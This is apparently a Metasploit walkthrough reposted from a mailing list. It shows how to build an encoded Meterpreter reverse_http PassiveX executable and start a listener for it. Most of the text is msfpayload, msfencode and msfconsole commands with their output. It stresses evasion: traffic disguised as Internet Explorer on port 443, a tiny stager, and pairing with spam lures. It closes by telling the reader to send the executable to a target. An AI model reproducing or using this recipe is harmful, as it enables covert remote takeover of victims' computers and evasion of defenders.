I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.
A really down and dirty explination of what PassiveX is and why it’s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).
(props to skape for writting PassiveX and @NatronKeltner for kicking in the latest tweaks to make it work with IE7/IE8)
Here are the options for msfpayload:
Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
And msfencode’s options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):
./msfencode -h Usage: ./msfencode <options> OPTIONS: -a <opt> The architecture to encode as -b <opt> The list of characters to avoid: 'x00xff' -c <opt> The number of times to encode the data -e <opt> The encoder to use -h Help banner -i <opt> Encode the contents of the supplied file path -l List available encoders -m <opt> Specifies an additional module search path -n Dump encoder information -o <opt> The output file -s <opt> The maximum size of the encoded data -t <opt> The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)
Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:
./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe [*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)
Now that we have our “malicious payload” in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):
./msfconsole _ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / _|/ _|/ / _| | | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/ /| | =[ msf v3.3-dev + -- --=[ 376 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops =[ 153 aux msf > use multi/handler msf exploit(handler) > exploit -h
(I’m showing you ‘exploit’s options because a lot of people don’t know they exist. With two lines you can start your listener (use, then exploit):**
Usage: exploit [options] Launches an exploitation attempt. OPTIONS: -e <opt> The payload encoder to use. If none is specified, ENCODER is used. -h Help banner. -j Run in the context of a job. -n <opt> The NOP generator to use. If none is specified, NOP is used. -o <opt> A comma separated list of options in VAR=VAL format. -p <opt> The payload to use. If none is specified, PAYLOAD is used. -t <opt> The target index to use. If none is specified, TARGET is used. -z Do not interact with the session after successful exploitation. msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False [*] Exploit running as background job. [*] PassiveX listener started. [*] Starting the payload handler... msf exploit(handler) >
Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you’re set.